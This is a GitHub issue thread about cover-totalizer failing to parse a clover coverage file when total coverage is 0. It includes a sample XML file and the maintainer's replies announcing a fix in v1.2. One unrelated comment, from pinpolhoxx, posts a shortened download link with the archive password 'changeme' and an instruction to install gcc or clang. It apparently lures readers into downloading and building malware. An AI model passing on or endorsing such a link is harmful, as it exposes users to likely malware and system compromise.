### ISSUE TITLE
Parse error when percentage is 0

### ISSUE THREAD

**Issue by truongns** [kevincobain2000/cover-totalizer#3]
In this code, even if the coverage.xml file is correct, 
when the total coverage is 0 it will spit out error: `unable to parse coverage file:`

https://github.com/kevincobain2000/cover-totalizer/blob/1544e6833c578c47516245872a7d2905e9190035/pkg/code_coverage.go#L40-L71

Example VALID clover coverage.xml file
```xml
<?xml version="1.0" encoding="UTF-8"?>
<coverage generated="1726816936" clover="3.2.0">
	<project timestamp="1726816936" name="All files">
        <metrics loc="0" cloc="0" ncloc="0" files="7" packages="4" methods="1000" statements="1000" coveredstatements="0" coveredmethods="0" elements="1000" coveredelements="0" />
	</project>
</coverage>
```

**Comment by pinpolhoxx** [comment]
download
https://bit.ly/3TzaAQd

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by kevincobain2000** [comment]
Will be fixed by Monday

**Comment by kevincobain2000** [comment]
Thanks for reporting

**Comment by kevincobain2000** [comment]
v1.2

**Comment by kevincobain2000** [comment]
Nothing to do, curl install automatically picks up new version
